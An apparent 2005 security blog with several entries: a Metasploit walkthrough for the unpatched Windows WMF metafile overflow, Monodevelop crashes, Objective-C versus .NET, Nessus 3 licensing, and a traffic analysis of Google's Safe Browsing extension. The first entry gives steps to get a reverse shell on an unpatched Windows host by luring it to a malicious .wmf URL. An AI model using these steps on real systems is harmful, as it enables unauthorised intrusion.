Nitesh Dhanjani

HD Moore has released a module for the Metaploit framework targeting the "Windows XP/2003 Picture and Fax Viewer Metafile Overflow" vulnerability. Here is how easy it is to exploit this now:

1) Download the latest Metasploit 2.x Snapshot
2) Run ./msfweb
3) Point your web browser to http://127.0.0.1:55555
4) Click on "Windows XP/2003 Picture and Fax Viewer Metafile Overflow"
5) Click on "Automatic - Windows XP / Windows 2003 (default)"
6) Select a payload. For example, "win32_reverse". Make sure you have your firewall turned off, or have a rule allowing incoming connections to port 8080 (or whatever port you choose)
7) Click on "-Exploit-"
8) From an un-patched (this is easy as of today, since there is no official patch for this vulnerability) Windows XP or 2003 host, use Internet Explorer browse to http://[ip]:8080/anything.wmf where [ip] is set to the ip-address of the host running Metasploit.
9) Your Metasploit browser session should now output details:

10) Click on the "Session [number]" link, and you now have shell access to the Windows host! Type in the DOS command of your choice, for example "ipconfig" in the screenshot below:

Lets hope there is a official patch released soon! Meanwhile, disable actions on the .wmf extension. Here are instructions on how to do this from the advisory: on the Start menu, choose Run, type "regsvr32 -u %windir%\system32\shimgvw.dll", and then click OK.

Has anyone gotten monodevelop to work via fink? For me, it's been broken for months now. I've been ignoring the hi-color theme warnings, I doubt if thats whats causing the SIGSEGV. Let me know if you know of a solution.

$ monodevelop

in <0xffffffff> (wrapper managed-to-native) Gtk.Dialog:gtk_dialog_run (intptr)
in <0x84> (wrapper managed-to-native) Gtk.Dialog:gtk_dialog_run (intptr)
in <0x38> Gtk.Dialog:Run ()
in <0x34> MonoDevelop.Core.Gui.Dialogs.ErrorDialog:Run ()
in <0x964> MonoDevelop.Ide.Gui.IdeStartup:Run (string[])
in <0x228> MonoDevelop.Core.AddIns.AddInService:StartApplication (string,string[])
in <0x38> MonoDevelop.Startup.SharpDevelopMain:Main (string[])
in <0x68> (wrapper runtime-invoke) System.Object:runtime_invoke_int_string[] (object,intptr,intptr,intptr)


Update: After giving some though to one of the responses on my O'Reilly blog, I have decided to take down the email thread between Jobs and myself. I have no way of knowing if Jobs would be OK with me posting the e-mail publicly, even though the contents of the e-mail didn't contain anything private or sensitive.

That said, I'd like to turn this entry into a discussion of what people think of having to use Objective C to code Cocoa applications. Feel free to comment on my O'Reilly blog. Here is my take on the subject: "Although I am a die-hard Apple and OSX fan, I've never cared for Objective-C much. As far as the development world is concerned, it is my opinion that Microsoft has done wonderful things with .NET, while Apple hasn't churned out much innovation (not recently at least.) I'd like to see Apple developers gain more choice. With every iteration of OSX, there seems to be so much effort put into innovation of desktop components, but the development environment is age old. I use Objective C because I have to, while I use recent languages such as C# and ruby because I want to. Take look at with Microsoft is doing with .NET: you can write your own .NET compiler - you just have to make sure it spits out the required IL code. It's beautiful and elegant, and you aren't locked onto one language. It's managed, and therefore a bit more expensive, but unless you are writing real time code, it doesn't matter today: it's not _that_ slow for writing most desktop applications. In short, I'd love to see Apple investigate managed code, and perhaps help bind Cocoa with more interesting and fun languages."

[Again, for comments, please visit my O'Reilly blog]
Update2 (12/27/2005): Thanks to those who commented below - most of the comments have been quite constructive and I've enjoyed reading them. I'd like to add the following notes to supplement my views:

1) I am not suggesting Apple carbon copy .NET and port it to the OSX as is. I am suggesting that Apple put in some resources to investigate the innovations and choices (C#, Python, etc can be used to spit out .NET assemblies. It is possible to write a compiler for .NET as long as they adhere to the IL specification - this is what I mean by more choice) offered by .NET and similarly offer it's developers more choice. I am suggesting that Apple take a _lead_ with offering its developers new paradigms of creating applications. Feel free to comment on your like or dislike for .NET and compare C# to Objective-C if you must, but you'd have lost the gist of my argument.

2) I do not agree that .NET is 'too slow' or only useful for developing quick and dirty solutions. I have come across a _lot_ of good enterprise level implementations of applications coded in .NET. Please don't attempt to convince me that .NET doesn't work for enterprise level applications - I have seen otherwise.

3) I do not agree with the "If its not broke, don't fix it" argument. This is an extremely dangerous argument. It limits progress and innovation. For example, Panther was a great iteration of OSX - why did Apple have to work towards Tiger? If one were to accept the "don't fix it" argument, Apple shouldn't have released Tiger, and Apple doesn't need to release any more iterations of OSX. Everything seems 'not broke' with Tiger today, why bother? The answer: innovation. There has got to be a non-stop iteration of improvements. Apple hasn't disappointed me with progress made towards OSX desktop components, and so I'd be happy to see a stronger push towards more choices and newer methods of development.

4) I do not agree with assertions along the lines of "Objective-C is the best. There is nothing better." Language preference is a matter of _taste_, and this cannot be forced upon anyone. _You_ may like the Objective-C way of doing things, but _I_ prefer newer languages such as ruby and C#. I am suggesting Apple investigate and put in efforts towards giving people more choice. There is no doubt in my mind that more developers will be enticed into developing for the OSX platform if they had more choice. Also see 7)

5) I am not suggesting Apple abandon Objective-C. Clearly, it has a tremendous fan following.

6) I am aware, and I appreciate many community related efforts towards bridging Cocoa with other languages. However, many of these are incomplete, and I'd be delighted if Apple chose to sponsor similar efforts.

7) As with .NET in 1), my example of ruby is just that - an example. I am not insisting that Apple only bind languages such as ruby and C# to Cocoa because I happen to like them. I am suggesting that Apple take a look at how these languages are improving the lives of developers. For all I care, Apple could come up with a brand new language after drawing inspiration from recent innovations of ruby and the like.

8) I am not suggesting that Apple has made no progress in the past few months. For example, I am aware of new solutions such as Core Data and Core Image to name a few.

To sum it up: Apple has blown me away with it's innovation with desktop components. For example, after having used Expose with hot-corners, I can't imagine life without it. I'd like Apple to channel some energy towards giving it's developers more choice of languages, and perhaps learn a thing or two from efforts such as the .NET environment and the ruby language.

Perhaps I should've posted the above with my original post, but I had no idea I was going to get Slashdotted. I've enjoyed most of the comments - but the amount of responses has been quite overwhelming. Much appreciated though!

Episode 5 of Systm is based on the Asterisk project (open source PBX software). They also mention Hitachi's wireless IP phone. Very informative and highly recommended!

For 3 years, I had the opportunity to work from home. I would travel to client locations as needed, and enjoyed the freedoms of a true and ideal consulting lifestyle. During this time, I felt I was most creative, for I had the energy to author two books, articles, and speak at information security conferences around the world. During that time, I felt I was a member of the 'cafe environment' Mark Morford describes in his article "Why Do You Work So Hard?":

Call it "the cafe question." Any given weekday you can stroll by any given coffee shop in the city and see dozens of people milling about, casually sipping and eating and reading and it's freakin' noon on a Tuesday and you're like, wait, don't these people work? Don't they have jobs? They can't all be students and trust-fund babies and cocktail waitresses and drummers in struggling rock bands who live at home with their moms.

Our culture allows almost no room for creative breaks. There is little tolerance for seeking out a different kind of "work" that doesn't somehow involve cubicles and widening butts and sour middle managers monitoring your e-mail and checking your Web site logs to see if you've wasted a precious 37 seconds of company time browsing [censored]...

These days, however, I am stuck with a routine 9 to 5 lifestyle. Add to that office politics, _ridiculous_ controls and procedures, the daily work commute routine - and I am left with no energy or the will to embark on anything creative. It does appear that the routine corporate environment does not suit me well, and I will have to negotiate some changes soon in order to revert back to my older lifestyle.

If you haven't had a chance to read Mark's article, I do recommend it highly. I will end this entry with the following quote from the column:

We are designed, weaned, trained from Day 1 to be productive members of society. And we are heavily guilted into believing that must involve some sort of droning repetitive pod-like dress-coded work for a larger corporate cause, a consumerist mechanism, a nice happy conglomerate.

The Metasploit team has just released version 3.0 (warning: alpha) of their framework. This release is a complete rewrite of the 2.0 version, and it is written in ruby! For OSX, you will need the ruby and ruby-ssl packages (via fink). Currently, only the Linux and OSX platforms are supported. More details available at http://metasploit.com/projects/Framework/msf3/.

Google just released a new Firefox extension called “Safe Browsing for Firefox”. From the "Introduction" section of the plug-in website, here is what it does:

"Google Safe Browsing is an extension to Firefox that alerts you if a web page that you visit appears to be asking for your personal or financial information under false pretences. This type of attack, known as phishing or spoofing, is becoming more sophisticated, widespread and dangerous. That's why it's important to browse safely with Google Safe Browsing. By combining advanced algorithms with reports about misleading pages from a number of sources, Safe Browsing is often able to automatically warn you when you encounter a page that's trying to trick you into disclosing personal information."

Good enough. I clicked on the FAQ section of the web-site to learn how the extension works, and here is the explanation given:

"6. How does Google know a page is bogus?
We use several techniques to determine whether a page is genuine, including the use of a blacklist containing pages that have been identified as suspicious and/or misleading based on automated detection or user reports. Our software also examines pages' content and structure in order to catch potentially misleading pages. Google Safe Browsing can't offer perfect protection, so you should always be on the lookout for indications that a site isn't what it appears to be. But Google Safe Browsing can help identify and protect you against many of the sites designed to trick users."

Great – but what information does the extension send to Google? To find out, I intercepted the traffic between my Firefox browser and google.com. For every request you make, the extension invokes /safebrowsing/lookup on http://www.google.com. So, if you were to goto cnn.com with the extension enabled, here is the HTTP GET request that will be sent to http://www.google.com:


GET /safebrowsing/lookup?sourceid=firefox-antiphish&features=
TrustRank&client=navclient-auto-ape&q=http%3A%2F%2Fcnn.com%2F HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: [deleted]


Since http://cnn.com is a legitimate domain name, http://www.google.com/safebrowsing/lookup sends the following back:

HTTP/1.1 200 OK
Content-Type: text/plain
Server: TrustRank Frontend
Content-Length: 0
Date: Thu, 15 Dec 2005 10:16:55 GMT


And all is well. To test what happens when you do come across a ‘phishy’ website, I logged into my Yahoo! account and looked at one of the billion Paypal phishing emails I get everyday, and found the following URL: http://mail.teleline.hu/%20/https:/www.paypal.com/cgi-bin/
webscr/update.html. This is obviously a phishing attempt, and sure enough, the Google extension caught it:

The following response was sent back by http://www.google.com/safebrowsing/lookup to the Firefrox extension when I visited the above website:


HTTP/1.1 200 OK
Content-Type: text/plain
Server: TrustRank Frontend
Cache-Control: private, x-gzip-ok=""
Date: Thu, 15 Dec 2005 10:04:47 GMT
Content-Length: 11

phishy:1:1


So, in a nutshell, the extension looks for the phishy:1:1 response from http://www.google.com/safebrowsing/lookup and alerts the user.

Here are two things that bother me about this extension:

1) Every request is transmitted to Google over HTTP, i.e. in clear-text. This is not good. Here is why: Consider a web application that uses SSL to encrypt the session. If this web application were to submit private information about you via a GET request (i.e in the URL, such as a credit card number), this will now be transmitted to http://www.google.com/safebrowsing/lookup in clear-text, allowing someone on your network segment, or any router in between yourself and google.com to sniff the information off the wire.

2) The extension sends the entire GET request to Google. If a web application were to send private information via GET parameters, this will now be transmitted to Google.

I am more worried about the issue #1. However, I do realize that web applications should be designed to use POST in order to send sensitive information, but the fact of the matter is that many web applications do not follow this guideline. Google's extension makes this situation worse by transmitting this information over clear text (assuming the web application uses SSL). This extension is designed to help protect users from illegitimate resources, but the irony is that it has the potential to expose sensitive information about you when you visit legitimate resources!

So there you have it – my preliminary analysis of Google’s new Firefox extension.

Tenable has released Nessus 3.0.0. I gave it a whirl, and it does seem to be snappier. Here are the major enhancements in Nessus 3.0.0 (from nessus.org):

New NASL3 engine
Improved plugin storage for faster startup time
Improved networking functions
New scanner architecture to be both efficient and robust
The Nessus daemon fetches the plugins automatically when registered (this can be disabled in nessusd.conf)
Improved error handling

An OSX port is not expected to be available by January 2006. I definitely look forward to that. Click here to downloaded Nessus 3.0.0.

Ron Gula, CTO and CEO of Tenable, was interviewed by Federico Biancuzzi over at SecurityFocus. Federico asked Ron why Tenable decided not to release Nessus3 under the GPL license, and here is what he had to say:

"Ron Gula: Customer demand. Organizations want a free product that they can use, and a place they can get commercial support and training from if needed. I'd also like to point out that although Nessus 3 is not released under the GPL, Tenable is still actively maintaining Nessus 2. We just released an update for Nessus 2.2 with lots of improvements.

Ron Gula: There [was a] very small benefit to working with one set of code, but the overwhelming reason was to have a better relationship with our user base - a majority of which can't really use GPL code. Of course everyone does, but in this day an age of SOX, FISMA and 'process' a lot of folks are having to replace open source solutions with technology that is supportable and has licenses inline with whatever corporate policy is out there."

I called up Mike Horton, a friend of mine, and asked him about Ron Gula's comments. Mike has been involved with a considerable amount of SOx IT process work since the past few months. I asked him if SOx prohibits the use of open source scanning software, and this was his response: "In short - No. SOx specifies no technology requirements to any such degree. At first I was thinking that Tenable's switch to closed source is based more on efficiency and cost of resources. But they are still actively maintaining version 2 and put out a new version 3 that is still free (no cost). In thinking about his comments in the interview further, another possible and more plausible reason he may be alluding to in relation to SOx is easier 'control' of change management for the company using Nessus for their SOx security testing. Software change management is a major part of the IT portion of SOx being tested by companies out there. Now, my understanding is that most companies are not carrying the need for change management controls for SOx all the way to the tools used for the security testing/auditing. The primary focus of the IT portion of SOx is to review controls in place for the company's financial oriented software applications and the systems directly supporting them. And as I understand, that is what many companies are focusing their efforts on. But, because there are no clear requirements for how SOx compliance should be tested, I can also imagine a fair number of companies are also going down the path of ensuring change controls are in place for the code bases of supporting applications, such as Nessus. In this scenario, if the source of the tool is open, then it 'could' be altered, and so it would need to have change management controls in place to ensure it is only changed when it is supposed to be changed. For these companies, if Tenable were to provide a closed source version for them to use as a part of their security controls for SOx compliance, then they would not have to show proper change management control for the code, which would make life a bit easier for them."

In my previous entry about this issue, I presented Renaud Deraison’s [also of Tenable] comments on why Nessus won’t be GPL’d.

"Virtually nobody has ever contributed anything to improve the scanning _engine_ over the last 6 years. I'm not talking about shoe- horning DB support in nessusd, but really to contribute things which make the scans faster, or Nessus more powerful.

A number of companies are _using_ the source code against us, by selling or renting appliances, thus exploiting a loophole in the GPL. So in that regard, we have been fueling our own competition and we want to put an end to that. Nessus3 contains an improved engine, and we don't want our competition to claim to have improved ‘their’ scanner."

Renaud’s reasoning on why Nessus3 won’t be GPL’d seem a lot more sincere and straight-forward. After speaking with Mike Horton, I can see why Tenable may want to release a closed source distribution of Nessus, but I find it odd that Renaud and Gula presented two completely different reasons when asked why Nessus3 won’t be under the GPL. Perhaps Gula and Renaud should have a chat, and come up with a consistent answer when queried on this topic - I'm sure Tenable is frequently going to be asked to comment on this issue in the near future.